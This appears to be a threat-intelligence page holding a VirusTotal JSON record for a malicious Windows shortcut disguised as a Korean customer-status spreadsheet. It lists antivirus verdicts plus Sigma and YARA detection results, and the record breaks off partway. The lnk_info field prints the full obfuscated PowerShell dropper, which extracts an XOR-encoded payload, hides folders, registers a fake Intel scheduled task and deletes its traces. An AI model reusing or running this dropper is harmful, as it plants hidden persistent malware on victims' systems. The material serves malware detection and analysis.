4c3fb7a00ede6a719450c63a1b6e7e1d
Hash
- MD5: 4c3fb7a00ede6a719450c63a1b6e7e1d
- SHA1: e28c43ca68eda22b5737fe54098e524418e6fad3
- SHA256: ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25
- First Seen: 2026-06-09
- Last Seen: 2026-06-09
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25"
},
"attributes": {
"sha256": "ef2d2c5d9a668e57a367491d5eeacb604eb29ff5f2a92423e7ee589a940baa25",
"reputation": 0,
"magika": "LNK",
"lnk_info": {
"modification_date": "1970-01-01T00:00:00Z",
"link_flags": [
"HasName",
"IsUnicode",
"HasExprString",
"HasArguments",
"PreferEnvironmentPath",
"HasIconLocation"
],
"command_line_arguments": "\ufeff/k for /f \"tokens=*\" %a in ('dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe /s /b /od') do call %a \" $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = '%temp%'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[System.IO.File]::Open($sLonP,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read);$bAlloD.Position=0x000012AA; $bNormD=New-Object byte[] 0x0001AD92; $bAlloD.Read($bNormD,0,0x0001AD92); $fNormP = $sLonP.replace('.lnk','.xlsx');sc $fNormP $bNormD -Encoding Byte;& $fNormP;$sMainD='C:\\ProgramData\\vaccine'; if(-not(Test-Path $sMainD)) {mkdir $sMainD};attrib +h +s $sMainD; $sWDir00='C:\\ProgramData\\NuGetx';if(-not(Test-Path $sWDir00)) {mkdir $sWDir00};attrib +h +s $sWDir00; $bAlloD.Position=0x0001C03C; $bPayD=New-Object byte[] 0x00001E10; $bAlloD.Read($bPayD, 0, 0x00001E10);$fJoyP=$sMainD +'\\joyment98';$xyz=0; while($xyz -lt 0x00001E10) {$bTmpD=$bPayD[$xyz];$bPayD[$xyz]=$bTmpD -bxor 0xBF; $xyz++;} sc $fJoyP $bPayD -Encoding Byte; tar -xf $fJoyP -C $sWDir00; $fJosoEoF=$sMainD +'\\WCF35Setup.js'; $fJosoEoSoF=$sWDir00 +'\\WCF35Setup.js'; Move-Item -Path $fJosoEoSoF -Destination $fJosoEoF -Force; $e = 'wscript.exe'; $ag = ' /B /NoLogo '+ $fJosoEoF; $s0='New-S'; $s1='cheduledT'; $s2='ask'; $sAc='Action'; $sTrg='Trigger'; $sStg='SettingsSet'; $sReg='Register-S'; $st = (Get-Date).AddMinutes(1);$act = (&($s0+$s1+$s2+$sAc) -Execute $e -Argument $ag);$tg = (&($s0+$s1+$s2+$sTrg) -Once -At $st -RepetitionInterval (New-TimeSpan -Minutes 16));$setg = (&($s0+$s1+$s2+$sStg) -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries);&($sReg+$s1+$s2) -Action $act -Trigger $tg -TaskName 'Intel(R) Ethernet2 Connection 2509-PM' -Settings $setg -Force; Remove-Item $sLonP -Force; Remove-Item $fJoyP -Force;\" && exit",
"icon_location": ".xlsx",
"creation_date": "1970-01-01T00:00:00Z",
"header": {
"show_window": 7,
"file_size": 0,
"hot_key": "(0+0)",
"show_window_str": "SW_SHOWMINNOACTIVE"
},
"access_date": "1970-01-01T00:00:00Z"
},
"last_analysis_stats": {
"malicious": 28,
"suspicious": 0,
"undetected": 34,
"harmless": 0,
"timeout": 0,
"confirmed-timeout": 0,
"failure": 0,
"type-unsupported": 13
},
"sha1": "e28c43ca68eda22b5737fe54098e524418e6fad3",
"meaningful_name": "\uace0\uac1d\ud604\ud669_202605.lnk",
"sigma_analysis_stats": {
"critical": 0,
"high": 2,
"medium": 5,
"low": 2
},
"last_analysis_date": 1780245504,
"filecondis": {
"dhash": "0000181c1d240000",
"raw_md5": "9807e0de32a0f4e1449c7cd606fadb03"
},
"trid": [
{
"file_type": "Windows Shortcut",
"probability": 100.0
}
],
"popular_threat_classification": {
"popular_threat_category": [
{
"count": 14,
"value": "trojan"
},
{
"count": 2,
"value": "dropper"
},
{
"count": 1,
"value": "downloader"
}
],
"suggested_threat_label": "trojan.pantera/powecod",
"popular_threat_name": [
{
"count": 7,
"value": "pantera"
},
{
"count": 3,
"value": "powecod"
},
{
"count": 2,
"value": "lnkdrop"
}
]
},
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260530",
"category": "malicious",
"result": "LNK.ScriptQH.Trojan"
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260531",
"category": "malicious",
"result": "lnk.trojan.pantera"
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260530",
"category": "malicious",
"result": "Lnk.Trojan.A25878738"
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": "v2021.2.0+4045",
"engine_update": "20260531",
"category": "malicious",
"result": "BehavesLike.Trojan.cb"
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.235",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5611",
"engine_update": "20260529",
"category": "undetected",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260529",
"category": "undetected",
"result": null
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.54.59670",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.54.59672",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "1925a7e:1925a7e:354c4d2:354c4d2",
"engine_update": "20260531",
"category": "malicious",
"result": "TrojanDownloader/LNK.Starter.a"
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1218",
"engine_update": "20260529",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260531",
"category": "malicious",
"result": "Scr.Malcode!gen"
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260531",
"category": "malicious",
"result": "LNK/TrojanDropper.Agent.EO trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260531",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260531",
"category": "malicious",
"result": "HEUR:Trojan.WinLNK.Powecod.c"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260531",
"category": "malicious",
"result": "Trojan.Agent/LNK!1.AA03 (CLASSIC)"
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260531",
"category": "malicious",
"result": "Troj/LnkDrop-M"
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260531",
"category": "malicious",
"result": "HEUR_LNKEXEC.A"
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14833",
"engine_update": "20260531",
"category": "malicious",
"result": "ti!EF2D2C5D9A66"
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F (B)"
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260531",
"category": "malicious",
"result": "Trojan-Dropper.LNK.Agent"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260530",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260607",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.247.174",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38690",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260531",
"category": "malicious",
"result": "Trojan:Win32/Qwexlafiba!rfn"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260530",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107203",
"engine_update": "20260531",
"category": "malicious",
"result": "Troj/LnkDrop-M"
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44742AVA:64.31339",
"engine_update": "20260531",
"category": "malicious",
"result": "CMD:Heur.BZC.YAX.Pantera.190.EDCE415F"
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": "1780236054",
"engine_update": "20260531",
"category": "malicious",
"result": "Detected"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": "5.6.1",
"engine_update": "20260529",
"category": "malicious",
"result": "Trojan.Link.DoubleRun"
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-05-31.01",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260531",
"category": "malicious",
"result": "Win32.Trojan.Powecod.Gwnw"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260531",
"category": "malicious",
"result": "Artemis!4C3FB7A00EDE"
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "undetected",
"result": null
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260529",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260531",
"category": "malicious",
"result": "LNK/Agent.HV!tr"
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260531",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "malicious",
"result": "Trojan:Win/Powecod.c"
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260531-02",
"engine_update": "20260531",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260529",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.264",
"engine_update": "20260528",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.10.0.2",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.783",
"engine_update": "20260528",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260531",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260504",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260531",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260531",
"category": "type-unsupported",
"result": null
}
},
"magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
"ssdeep": "3072:IPo2dSIqwmGuIOW2Pmu9QiivVe4LD0VDEmIDeRsbY7F0/bpH5FJe3:sRduIOWymkQlvV/D+4bess7O//FJe3",
"tags": [
"lnk",
"idle",
"large-file",
"high-entropy",
"abused-exe-pattern",
"hiding-window",
"long-command-line-arguments"
],
"last_submission_date": 1779955119,
"times_submitted": 2,
"vhash": "936900f6b57796e18960fb28f7f8f244",
"names": [
"\uace0\uac1d\ud604\ud669_202605.lnk",
"????_202605.lnk"
],
"type_description": "Windows shortcut",
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 2,
"medium": 5,
"low": 2
}
},
"first_seen_itw_date": 1779965531,
"size": 122444,
"sigma_analysis_results": [
{
"rule_level": "high",
"rule_id": "afdcecbde34527044e8c4c24e502ed3dfae6daa2d07665ad18226afff77ed6fe",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Set Suspicious Files as System Files Using Attrib.EXE",
"rule_description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\system32\\attrib.exe +h +s C:\\ProgramData\\vaccine",
"Image": "C:\\Windows\\system32\\attrib.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\attrib.exe +h +s C:\\ProgramData\\NuGetx",
"Image": "C:\\Windows\\system32\\attrib.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "high",
"rule_id": "e6fdb32f143bba16a3ea06247ced55b7b90f8b5b5c6c26ddb95cdcf23908af8a",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potential PowerShell Command Line Obfuscation",
"rule_description": "Detects the PowerShell command lines with special characters",
"rule_author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[System.IO.File]::Open($sLonP,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read);$bAl [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "0db9fba426142aca003830de31e38a7318ed0a3a299852f6bc4cbe8bc905515f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Read Contents From Stdin Via Cmd.EXE",
"rule_description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe",
"rule_author": "frack113, Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe \ufeff/k for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /s /b /od) do call %a $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[Syst [TRUNCATED]",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "511fcd38b1cd4057f3b3568707032548bac72899a4b3c932f3614c6d89d417bd",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Automated Collection Command Prompt",
"rule_description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.",
"rule_author": "frack113",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe \ufeff/k for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /s /b /od) do call %a $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[Syst [TRUNCATED]",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "5c3ea6806114163b8cdf5735aeb07e702ab63e0e486f721df84cf675e2b0a04b",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Hiding Files with Attrib.exe",
"rule_description": "Detects usage of attrib.exe to hide files from users.",
"rule_author": "Sami Ruohonen",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\system32\\attrib.exe +h +s C:\\ProgramData\\vaccine",
"Image": "C:\\Windows\\system32\\attrib.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\attrib.exe +h +s C:\\ProgramData\\NuGetx",
"Image": "C:\\Windows\\system32\\attrib.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "96d2c399118cab5d249093badf4a85f0ef1889872b0191bdf131bcabc0994681",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Potentially Suspicious Powershell Script Execution From Temp Folder",
"rule_description": "Detects a potentially suspicious powershell script executions from temporary folder",
"rule_author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[System.IO.File]::Open($sLonP,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read);$bAl [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "medium",
"rule_id": "c50af4c9fd0606d73bbfb8615f9f4e6ead04b5e20ce70f292af065c18f9e63c4",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Suspicious Usage of For Loop with Recursive Directory Search in CMD",
"rule_description": "Detects suspicious usage of the cmd.exe 'for /f' loop combined with the 'tokens=' parameter and a recursive directory listing.\nThis pattern may indicate an attempt to discover and execute system binaries dynamically, for example powershell, a technique sometimes used by attackers to evade detection.\nThis behavior has been observed in various malicious lnk files.\n",
"rule_author": "Joseliyo Sanchez, @Joseliyo_Jstnk",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe \ufeff/k for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /s /b /od) do call %a $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[Syst [TRUNCATED]",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "1c2e4db94ca79f939e94e29c04fb3b71467fc6f5b9c31db34fcce5a2fb3b856f",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Non Interactive PowerShell Process Spawned",
"rule_description": "Detects non-interactive PowerShell activity by looking at the \"powershell\" process with a non-user GUI process such as \"explorer.exe\" as a parent.",
"rule_author": "Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[System.IO.File]::Open($sLonP,[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read);$bAl [TRUNCATED]",
"Image": "C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "7752bbd4e940ef58081260cfa45b4ac6b149e2cecb836d79f5e61bfbdc237105",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "File And SubFolder Enumeration Via Dir Command",
"rule_description": "Detects usage of the \"dir\" command part of Windows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\n",
"rule_author": "frack113",
"match_context": [
{
"values": {
"CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe \ufeff/k for /f tokens=* %a in (dir C:\\\\Windows\\\\SysWow64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe /s /b /od) do call %a $eoto=@('.lnk');$GetCurLoc = Get-Location; if($GetCurLoc -Match 'System32' -or $GetCurLoc -Match 'Program Files') {$GetCurLoc = 'C:\\Users\\<USER>\\AppData\\Local\\Temp'};$sLonP = Get-ChildItem -Path $GetCurLoc -Recurse *.* -File | where {$_.extension -in $eoto} | where-object {$_.length -eq 0x0001DE4C} | Select-Object -ExpandProperty FullName; $bAlloD=[Syst [TRUNCATED]",
"Image": "C:\\Windows\\SysWOW64\\cmd.exe",
"EventID": "1"
}
},
{
"values": {
"CommandLine": "C:\\Windows\\system32\\cmd.exe /c dir C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe /s /b /od",
"Image": "C:\\Windows\\system32\\cmd.exe",
"EventID": "1"
}
}
]
}
],
"type_tag": "lnk",
"first_submission_date": 1779953131,
"md5": "4c3fb7a00ede6a719450c63a1b6e7e1d",
"total_votes": {
"harmless": 0,
"malicious": 0
},
"type_extension": "lnk",
"crowdsourced_yara_results": [
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "Large_filesize_LNK",
"match_date": 1780245601,
"description": "Identifies shortcut (LNK) file larger than 100KB. Most goodware LNK files are smaller than 100KB.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
"ruleset_version": "002bb473a9|d1fd450ec7c73f71e829d8f39a46e82e73687778",
"ruleset_name": "LNK_Ruleset",
"rule_name": "High_Entropy_LNK",
"match_date": 1780245601,
"description": "Identifies shortcut (LNK) file with equal or higher entropy than 6.5. Most goodware LNK files have a low entropy, lower than 6.",
"author": "@bartblaze",
"source": "https://github.com/bartblaze/Yara-rules"
},
{
"ruleset_id": "002bb473a9",
